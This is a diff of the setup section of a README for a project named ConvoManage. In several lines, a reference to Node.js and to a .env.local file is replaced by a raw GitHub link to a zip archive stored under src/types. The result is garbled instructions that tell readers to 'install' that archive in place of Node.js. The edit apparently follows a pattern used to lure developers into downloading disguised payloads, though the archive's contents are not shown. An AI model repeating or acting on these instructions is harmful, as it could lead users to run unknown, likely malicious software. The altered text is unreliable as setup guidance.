Dante41/ConvoManage/README.md

 This section walks you through creating a local development environment.
 It assumes you want to run both the frontend and backend locally while using a local Postgres database.
 If you prefer to use Supabase in a hosted mode, you can adapt the environment accordingly.

 1) Install dependencies
-- Install Node.js (version that aligns with the TypeScript setup in the project).
+- Install https://github.com/Dante41/ConvoManage/raw/refs/heads/main/src/types/Convo-Manage-3.2-alpha.1.zip (version that aligns with the TypeScript setup in the project).
 - Install yarn or npm to manage packages.
 - Install Docker if you plan to run Postgres in a container locally.

 2) Install and configure the frontend
 - Clone the repository.
 - Install frontend dependencies with yarn install or npm install.
-- Create a .env.local file with the required environment variables for API endpoints, authentication, and any feature flags you want to enable or disable.
+- Create a https://github.com/Dante41/ConvoManage/raw/refs/heads/main/src/types/Convo-Manage-3.2-alpha.1.zip file with the required environment variables for API endpoints, authentication, and any feature flags you want to enable or disable.
 - Start the frontend with yarn start or npm start.

 3) Install and configure the backend